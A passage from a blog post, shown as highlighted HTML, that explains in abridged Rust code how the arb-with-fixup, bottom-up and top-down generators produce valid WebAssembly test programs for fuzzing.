        <span class="n">fixed</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">Inst</span><span class="o">&gt;</span><span class="p">,</span>
        <span class="n">stack</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">ValType</span><span class="o">&gt;</span><span class="p">,</span>
        <span class="n">inst</span><span class="p">:</span> <span class="o">&amp;</span><span class="n">Inst</span><span class="p">,</span>
    <span class="p">)</span> <span class="p">{</span>
        <span class="k">let</span> <span class="n">needed</span> <span class="o">=</span> <span class="n">inst</span><span class="nf">.operand_types</span><span class="p">(</span><span class="o">&amp;</span><span class="k">self</span><span class="py">.globals</span><span class="p">);</span>
        <span class="k">let</span> <span class="n">n</span> <span class="o">=</span> <span class="n">needed</span><span class="nf">.len</span><span class="p">();</span>

        <span class="k">if</span> <span class="n">stack</span><span class="nf">.len</span><span class="p">()</span> <span class="o">&gt;=</span> <span class="n">n</span> <span class="p">{</span>
            <span class="k">if</span> <span class="p">(</span><span class="mi">0</span><span class="o">..</span><span class="n">n</span><span class="p">)</span><span class="nf">.all</span><span class="p">(|</span><span class="n">i</span><span class="p">|</span> <span class="p">{</span>
                <span class="n">stack</span><span class="p">[</span><span class="n">stack</span><span class="nf">.len</span><span class="p">()</span> <span class="o">-</span> <span class="n">n</span> <span class="o">+</span> <span class="n">i</span><span class="p">]</span> <span class="o">==</span> <span class="n">needed</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>
            <span class="p">})</span> <span class="p">{</span>
                <span class="c1">// All needed operands are on the stack.</span>
                <span class="k">return</span><span class="p">;</span>
            <span class="p">}</span>
        <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">stack</span><span class="nf">.iter</span><span class="p">()</span><span class="nf">.enumerate</span><span class="p">()</span><span class="nf">.all</span><span class="p">(|(</span><span class="n">i</span><span class="p">,</span> <span class="n">ty</span><span class="p">)|</span> <span class="p">{</span>
                <span class="o">*</span><span class="n">ty</span> <span class="o">==</span> <span class="n">needed</span><span class="p">[</span><span class="n">i</span><span class="p">]</span>
            <span class="p">})</span> <span class="p">{</span>
                <span class="c1">// A prefix of needed operands are on the</span>
                <span class="c1">// stack; make constants for the tail that</span>
                <span class="c1">// are missing.</span>
                <span class="k">for</span> <span class="n">ty</span> <span class="k">in</span> <span class="o">&amp;</span><span class="n">needed</span><span class="p">[</span><span class="n">stack</span><span class="nf">.len</span><span class="p">()</span><span class="o">..</span><span class="p">]</span> <span class="p">{</span>
                    <span class="n">fixed</span><span class="nf">.push</span><span class="p">(</span><span class="n">ty</span><span class="nf">.make_const</span><span class="p">(</span><span class="nf">make_value</span><span class="p">()));</span>
                    <span class="n">stack</span><span class="nf">.push</span><span class="p">(</span><span class="o">*</span><span class="n">ty</span><span class="p">);</span>
                <span class="p">}</span>
                <span class="k">return</span><span class="p">;</span>
            <span class="p">}</span>
        <span class="p">}</span>

        <span class="c1">// Otherwise, just make constants for all the</span>
        <span class="c1">// needed operands.</span>
        <span class="k">for</span> <span class="n">ty</span> <span class="k">in</span> <span class="n">needed</span> <span class="p">{</span>
            <span class="n">fixed</span><span class="nf">.push</span><span class="p">(</span><span class="n">ty</span><span class="nf">.make_const</span><span class="p">(</span><span class="nf">make_value</span><span class="p">()));</span>
            <span class="n">stack</span><span class="nf">.push</span><span class="p">(</span><span class="o">*</span><span class="n">ty</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="c1">// ...</span>
<span class="p">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">fixup</code> method also makes sure that for all instructions that have an
immediate referencing some entity, the referenced entity is valid. For example,
for a <code class="language-plaintext highlighter-rouge">local.get $l</code> instruction, it ensures that local <code class="language-plaintext highlighter-rouge">$l</code> actually exists or
else rewrites the local to one that does exist.</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">impl</span> <span class="n">Module</span> <span class="p">{</span>
    <span class="c1">// ...</span>

    <span class="k">fn</span> <span class="nf">fixup_inst_immediates</span><span class="p">(</span>
        <span class="o">&amp;</span><span class="k">mut</span> <span class="k">self</span><span class="p">,</span>
        <span class="k">mut</span> <span class="n">make_value</span><span class="p">:</span> <span class="k">impl</span> <span class="nf">FnMut</span><span class="p">()</span> <span class="k">-&gt;</span> <span class="nb">i64</span><span class="p">,</span>
        <span class="n">has_mutable_global</span><span class="p">:</span> <span class="nb">bool</span><span class="p">,</span>
        <span class="k">mut</span> <span class="n">inst</span><span class="p">:</span> <span class="n">Inst</span><span class="p">,</span>
    <span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Option</span><span class="o">&lt;</span><span class="n">Inst</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="k">match</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">inst</span> <span class="p">{</span>
            <span class="nn">Inst</span><span class="p">::</span><span class="nf">LocalGet</span><span class="p">(</span><span class="n">l</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="o">*</span><span class="n">l</span> <span class="o">%=</span> <span class="k">self</span><span class="py">.param_types</span><span class="nf">.len</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span><span class="p">,</span>

            <span class="c1">// ...</span>

            <span class="nn">Inst</span><span class="p">::</span><span class="nf">I32Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
            <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">I64Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
            <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">F32Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
            <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">F64Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
            <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">V128Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span>
                <span class="k">if</span> <span class="k">self</span><span class="py">.num_memories</span> <span class="o">==</span> <span class="mi">0</span> <span class="p">{</span>
                    <span class="k">return</span> <span class="nb">None</span><span class="p">;</span>
                <span class="p">}</span>
                <span class="o">*</span><span class="n">m</span> <span class="o">%=</span> <span class="k">self</span><span class="py">.num_memories</span><span class="p">;</span>
            <span class="p">}</span>

            <span class="c1">// ...</span>

            <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">{}</span>
        <span class="p">}</span>

        <span class="nf">Some</span><span class="p">(</span><span class="n">inst</span><span class="p">)</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After calling <code class="language-plaintext highlighter-rouge">fixup</code>, the <code class="language-plaintext highlighter-rouge">arb</code> generator invokes <code class="language-plaintext highlighter-rouge">Module::to_wasm_binary</code> to
get the encoded Wasm program.</p>

<h4><code class="language-plaintext highlighter-rouge">bottom_up</code></h4>

<p>The <code class="language-plaintext highlighter-rouge">bottom_up</code> generator also uses abstract interpretation to track the types
of values on the stack. It generates instructions in forwards order, from
operands to operators. It begins with an empty stack, filters candidate
instructions down to just those that would be valid given the types currently on
the stack, randomly chooses one, updates the stack types accordingly, and
repeats the process. This is the same approach that <a href="https://docs.rs/wasm-smith"><code class="language-plaintext highlighter-rouge">wasm-smith</code></a> uses. After
generating instructions this way, it then makes sure that the final types on the
stack match the function signature’s results, similar to the end of <code class="language-plaintext highlighter-rouge">fixup</code>.</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">impl</span> <span class="n">Module</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">bottom_up</span><span class="p">(</span><span class="n">u</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">Unstructured</span><span class="o">&lt;</span><span class="nv">'_</span><span class="o">&gt;</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="k">Self</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// ...</span>

        <span class="k">let</span> <span class="n">max_insts</span> <span class="o">=</span> <span class="n">u</span><span class="nf">.int_in_range</span><span class="p">(</span><span class="mi">1</span><span class="o">..=</span><span class="n">MAX_INSTS</span><span class="p">)</span><span class="o">?</span><span class="p">;</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">instructions</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">stack</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">ValType</span><span class="o">&gt;</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>

        <span class="k">for</span> <span class="n">_</span> <span class="k">in</span> <span class="mi">0</span><span class="o">..</span><span class="n">max_insts</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">stack</span> <span class="o">==</span> <span class="n">result_types</span> <span class="o">&amp;&amp;</span> <span class="n">u</span><span class="nf">.ratio</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span><span class="o">?</span> <span class="p">{</span>
                <span class="k">break</span><span class="p">;</span>
            <span class="p">}</span>

            <span class="c1">// Choose a random instruction whose operand</span>
            <span class="c1">// types match those currently on the stack.</span>
            <span class="k">let</span> <span class="n">inst</span> <span class="o">=</span> <span class="nf">choose_inst_bottom_up</span><span class="p">(</span>
                <span class="n">u</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">stack</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">param_types</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">globals</span><span class="p">,</span>
                <span class="n">num_memories</span><span class="p">,</span>
            <span class="p">)</span><span class="o">?</span><span class="p">;</span>

            <span class="c1">// Apply this instruction's effects to the</span>
            <span class="c1">// stack.</span>
            <span class="nf">apply_inst</span><span class="p">(</span>
                <span class="o">&amp;</span><span class="n">inst</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="k">mut</span> <span class="n">stack</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">param_types</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">globals</span><span class="p">,</span>
            <span class="p">);</span>
            <span class="n">instructions</span><span class="nf">.push</span><span class="p">(</span><span class="n">inst</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// ...</span>

        <span class="nf">Ok</span><span class="p">(</span><span class="n">Module</span> <span class="p">{</span>
            <span class="n">param_types</span><span class="p">,</span>
            <span class="n">result_types</span><span class="p">,</span>
            <span class="n">globals</span><span class="p">,</span>
            <span class="n">num_memories</span><span class="p">,</span>
            <span class="n">instructions</span><span class="p">,</span>
        <span class="p">})</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">fn</span> <span class="nf">choose_inst_bottom_up</span><span class="p">(</span>
    <span class="n">u</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">Unstructured</span><span class="o">&lt;</span><span class="nv">'_</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="n">stack</span><span class="p">:</span> <span class="o">&amp;</span><span class="p">[</span><span class="n">ValType</span><span class="p">],</span>
    <span class="n">param_types</span><span class="p">:</span> <span class="o">&amp;</span><span class="p">[</span><span class="n">ValType</span><span class="p">],</span>
    <span class="n">globals</span><span class="p">:</span> <span class="o">&amp;</span><span class="p">[</span><span class="n">Global</span><span class="p">],</span>
    <span class="n">num_memories</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
<span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="n">Inst</span><span class="o">&gt;</span> <span class="p">{</span>
    <span class="c1">// Build up all the valid candidate instructions.</span>
    <span class="k">let</span> <span class="k">mut</span> <span class="n">candidates</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">Inst</span><span class="o">&gt;</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>

    <span class="c1">// Producers are always okay: [] -&gt; [t]</span>
    <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">I32Const</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
    <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">I64Const</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
    <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">F32Const</span><span class="p">(</span><span class="mf">0.0</span><span class="p">));</span>
    <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">F64Const</span><span class="p">(</span><span class="mf">0.0</span><span class="p">));</span>
    <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">V128Const</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
    <span class="k">if</span> <span class="o">!</span><span class="n">param_types</span><span class="nf">.is_empty</span><span class="p">()</span> <span class="p">{</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">LocalGet</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
    <span class="p">}</span>

    <span class="c1">// ...</span>

    <span class="k">let</span> <span class="n">top</span> <span class="o">=</span> <span class="n">stack</span><span class="nf">.last</span><span class="p">()</span><span class="nf">.copied</span><span class="p">();</span>
    <span class="k">let</span> <span class="n">second</span> <span class="o">=</span> <span class="n">stack</span><span class="nf">.get</span><span class="p">(</span><span class="n">stack</span><span class="nf">.len</span><span class="p">()</span> <span class="o">-</span> <span class="mi">2</span><span class="p">)</span><span class="nf">.copied</span><span class="p">();</span>

    <span class="c1">// Drop needs 1 operand of any type: [t] -&gt; []</span>
    <span class="k">if</span> <span class="n">top</span><span class="nf">.is_some</span><span class="p">()</span> <span class="p">{</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nb">Drop</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// i32 unary: [i32] -&gt; [...]</span>
    <span class="k">if</span> <span class="n">top</span> <span class="o">==</span> <span class="nf">Some</span><span class="p">(</span><span class="n">I32</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Clz</span><span class="p">);</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Ctz</span><span class="p">);</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Popcnt</span><span class="p">);</span>
        <span class="c1">// ...</span>
    <span class="p">}</span>

    <span class="c1">// i64 unary: [i64] -&gt; [...]</span>
    <span class="k">if</span> <span class="n">top</span> <span class="o">==</span> <span class="nf">Some</span><span class="p">(</span><span class="n">I64</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Clz</span><span class="p">);</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Ctz</span><span class="p">);</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Popcnt</span><span class="p">);</span>
        <span class="c1">// ...</span>
    <span class="p">}</span>

    <span class="c1">// ...</span>

    <span class="c1">// i32 binary: [i32 i32] -&gt; [...]</span>
    <span class="k">if</span> <span class="n">top</span> <span class="o">==</span> <span class="nf">Some</span><span class="p">(</span><span class="n">I32</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">second</span> <span class="o">==</span> <span class="nf">Some</span><span class="p">(</span><span class="n">I32</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Add</span><span class="p">);</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Sub</span><span class="p">);</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Mul</span><span class="p">);</span>
        <span class="c1">// ...</span>
    <span class="p">}</span>

    <span class="c1">// i64 binary: [i64 i64] -&gt; [...]</span>
    <span class="k">if</span> <span class="n">top</span> <span class="o">==</span> <span class="nf">Some</span><span class="p">(</span><span class="n">I64</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">second</span> <span class="o">==</span> <span class="nf">Some</span><span class="p">(</span><span class="n">I64</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Add</span><span class="p">);</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Sub</span><span class="p">);</span>
        <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Mul</span><span class="p">);</span>
        <span class="c1">// ...</span>
    <span class="p">}</span>

    <span class="c1">// ...</span>

    <span class="c1">// Choose a random instruction from the</span>
    <span class="c1">// candidates.</span>
    <span class="k">let</span> <span class="k">mut</span> <span class="n">inst</span> <span class="o">=</span> <span class="o">*</span><span class="n">u</span><span class="nf">.choose</span><span class="p">(</span><span class="o">&amp;</span><span class="n">candidates</span><span class="p">)</span><span class="o">?</span><span class="p">;</span>

    <span class="c1">// If the instruction has immediates, generate</span>
    <span class="c1">// them here, as they were hard-coded during</span>
    <span class="c1">// candidate selection.</span>
    <span class="k">match</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">inst</span> <span class="p">{</span>
        <span class="nn">Inst</span><span class="p">::</span><span class="nf">I32Const</span><span class="p">(</span><span class="n">v</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="o">*</span><span class="n">v</span> <span class="o">=</span> <span class="n">u</span><span class="nf">.arbitrary</span><span class="p">()</span><span class="o">?</span><span class="p">,</span>
        <span class="nn">Inst</span><span class="p">::</span><span class="nf">I64Const</span><span class="p">(</span><span class="n">v</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="o">*</span><span class="n">v</span> <span class="o">=</span> <span class="n">u</span><span class="nf">.arbitrary</span><span class="p">()</span><span class="o">?</span><span class="p">,</span>
        <span class="c1">// ...</span>
        <span class="nn">Inst</span><span class="p">::</span><span class="nf">GlobalGet</span><span class="p">(</span><span class="n">g</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="o">*</span><span class="n">g</span> <span class="o">=</span> <span class="n">u</span><span class="nf">.int_in_range</span><span class="p">(</span><span class="mi">0</span><span class="o">..=</span><span class="p">(</span><span class="n">globals</span><span class="nf">.len</span><span class="p">()</span> <span class="k">as</span> <span class="nb">u32</span> <span class="o">-</span> <span class="mi">1</span><span class="p">))</span><span class="o">?</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="c1">// ...</span>
        <span class="nn">Inst</span><span class="p">::</span><span class="nf">I32Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">I64Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">F32Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">F64Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">V128Load</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">I32Store</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">I64Store</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">F32Store</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">F64Store</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">V128Store</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">MemorySize</span><span class="p">(</span><span class="n">m</span><span class="p">)</span>
        <span class="p">|</span> <span class="nn">Inst</span><span class="p">::</span><span class="nf">MemoryGrow</span><span class="p">(</span><span class="n">m</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="o">*</span><span class="n">m</span> <span class="o">=</span> <span class="n">u</span><span class="nf">.int_in_range</span><span class="p">(</span><span class="mi">0</span><span class="o">..=</span><span class="p">(</span><span class="n">num_memories</span> <span class="o">-</span> <span class="mi">1</span><span class="p">))</span><span class="o">?</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">{}</span>
    <span class="p">}</span>

    <span class="nf">Ok</span><span class="p">(</span><span class="n">inst</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After constructing a <code class="language-plaintext highlighter-rouge">Module</code> via <code class="language-plaintext highlighter-rouge">bottom_up</code>, we don’t need to call <code class="language-plaintext highlighter-rouge">fixup</code>
because the module is already valid by construction, so all that’s left is
invoking <code class="language-plaintext highlighter-rouge">Module::to_wasm_binary</code> to get the encoded Wasm program.</p>

<h4><code class="language-plaintext highlighter-rouge">top_down</code></h4>

<p>The <code class="language-plaintext highlighter-rouge">top_down</code> generator is very similar to <code class="language-plaintext highlighter-rouge">bottom_up</code>, but instead of
generating instructions forwards, from operands to operators, it generates them
backwards, from operators to operands. Instead of maintaining a stack of the
types of values generated thus far by the instruction sequence prefix, it
maintains a stack of the types of values expected by the instruction sequence
suffix. This is the approach that <a href="https://insuyun.github.io/pubs/2025/park:rgfuzz.pdf"><code class="language-plaintext highlighter-rouge">rgfuzz</code></a> by Park, Kim, and Yun
takes.<sup><a class="footnote" href="https://fitzgeraldnick.com/weblog/feeds/latest-atom/#fn:rule-guided" rel="footnote">2</a></sup></p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">impl</span> <span class="n">Module</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">top_down</span><span class="p">(</span>
        <span class="n">u</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">Unstructured</span><span class="o">&lt;</span><span class="nv">'_</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="k">Self</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// ...</span>

        <span class="k">let</span> <span class="n">max_insts</span> <span class="o">=</span> <span class="n">u</span><span class="nf">.int_in_range</span><span class="p">(</span><span class="mi">1</span><span class="o">..=</span><span class="n">MAX_INSTS</span><span class="p">)</span><span class="o">?</span><span class="p">;</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">instructions</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">needed</span> <span class="o">=</span> <span class="n">result_types</span><span class="nf">.clone</span><span class="p">();</span>
        <span class="k">for</span> <span class="n">_</span> <span class="k">in</span> <span class="mi">0</span><span class="o">..</span><span class="n">max_insts</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">needed</span><span class="nf">.is_empty</span><span class="p">()</span> <span class="o">&amp;&amp;</span> <span class="n">u</span><span class="nf">.ratio</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span><span class="o">?</span> <span class="p">{</span>
                <span class="k">break</span><span class="p">;</span>
            <span class="p">}</span>

            <span class="c1">// Choose a random instruction in a</span>
            <span class="c1">// top-down manner.</span>
            <span class="k">let</span> <span class="n">inst</span> <span class="o">=</span> <span class="nf">choose_inst_top_down</span><span class="p">(</span>
                <span class="n">u</span><span class="p">,</span>
                <span class="n">needed</span><span class="nf">.last</span><span class="p">()</span><span class="nf">.copied</span><span class="p">(),</span>
                <span class="o">&amp;</span><span class="n">param_types</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">globals</span><span class="p">,</span>
                <span class="n">num_memories</span><span class="p">,</span>
            <span class="p">)</span><span class="o">?</span><span class="p">;</span>

            <span class="c1">// Pop the result type from `needed`, if</span>
            <span class="c1">// any, as it's been satisfied.</span>
            <span class="k">let</span> <span class="n">ty</span> <span class="o">=</span> <span class="n">inst</span><span class="nf">.result_type</span><span class="p">(</span>
                <span class="o">&amp;</span><span class="n">param_types</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">globals</span><span class="p">,</span>
            <span class="p">);</span>
            <span class="k">if</span> <span class="n">ty</span> <span class="o">==</span> <span class="n">needed</span><span class="nf">.last</span><span class="p">()</span><span class="nf">.copied</span><span class="p">()</span> <span class="p">{</span>
                <span class="n">needed</span><span class="nf">.pop</span><span class="p">();</span>
            <span class="p">}</span>

            <span class="c1">// Add operand type demands.</span>
            <span class="k">match</span> <span class="o">&amp;</span><span class="n">inst</span> <span class="p">{</span>
                <span class="nn">Inst</span><span class="p">::</span><span class="nb">Drop</span> <span class="k">=&gt;</span> <span class="p">{</span>
                    <span class="c1">// `drop` is polymorphic; choose</span>
                    <span class="c1">// a random type.</span>
                    <span class="n">needed</span><span class="nf">.push</span><span class="p">(</span><span class="n">u</span><span class="nf">.arbitrary</span><span class="p">()</span><span class="o">?</span><span class="p">);</span>
                <span class="p">}</span>
                <span class="nn">Inst</span><span class="p">::</span><span class="nf">GlobalSet</span><span class="p">(</span><span class="n">g</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span>
                    <span class="n">needed</span><span class="nf">.push</span><span class="p">(</span><span class="n">globals</span><span class="p">[</span><span class="o">*</span><span class="n">g</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">]</span><span class="py">.ty</span><span class="p">);</span>
                <span class="p">}</span>
                <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">{</span>
                    <span class="n">needed</span><span class="nf">.extend_from_slice</span><span class="p">(</span>
                        <span class="n">inst</span><span class="nf">.operand_types</span><span class="p">(</span><span class="o">&amp;</span><span class="n">globals</span><span class="p">),</span>
                    <span class="p">);</span>
                <span class="p">}</span>
            <span class="p">}</span>

            <span class="n">instructions</span><span class="nf">.push</span><span class="p">(</span><span class="n">inst</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// Fill remaining needed types with</span>
        <span class="c1">// constants.</span>
        <span class="k">for</span> <span class="n">ty</span> <span class="k">in</span> <span class="n">needed</span><span class="nf">.iter</span><span class="p">()</span><span class="nf">.rev</span><span class="p">()</span> <span class="p">{</span>
            <span class="n">instructions</span><span class="nf">.push</span><span class="p">(</span>
                <span class="n">ty</span><span class="nf">.make_const</span><span class="p">(</span><span class="n">u</span><span class="nf">.arbitrary</span><span class="p">()</span><span class="o">?</span><span class="p">),</span>
            <span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// Instructions were generated backwards, so</span>
        <span class="c1">// reverse.</span>
        <span class="n">instructions</span><span class="nf">.reverse</span><span class="p">();</span>

        <span class="nf">Ok</span><span class="p">(</span><span class="n">Module</span> <span class="p">{</span>
            <span class="n">param_types</span><span class="p">,</span>
            <span class="n">result_types</span><span class="p">,</span>
            <span class="n">globals</span><span class="p">,</span>
            <span class="n">num_memories</span><span class="p">,</span>
            <span class="n">instructions</span><span class="p">:</span> <span class="n">prefix</span><span class="p">,</span>
        <span class="p">})</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">fn</span> <span class="nf">choose_inst_top_down</span><span class="p">(</span>
    <span class="n">u</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">Unstructured</span><span class="o">&lt;</span><span class="nv">'_</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="n">target_ty</span><span class="p">:</span> <span class="nb">Option</span><span class="o">&lt;</span><span class="n">ValType</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="n">param_types</span><span class="p">:</span> <span class="o">&amp;</span><span class="p">[</span><span class="n">ValType</span><span class="p">],</span>
    <span class="n">globals</span><span class="p">:</span> <span class="o">&amp;</span><span class="p">[</span><span class="n">Global</span><span class="p">],</span>
    <span class="n">num_memories</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
<span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="n">Inst</span><span class="o">&gt;</span> <span class="p">{</span>
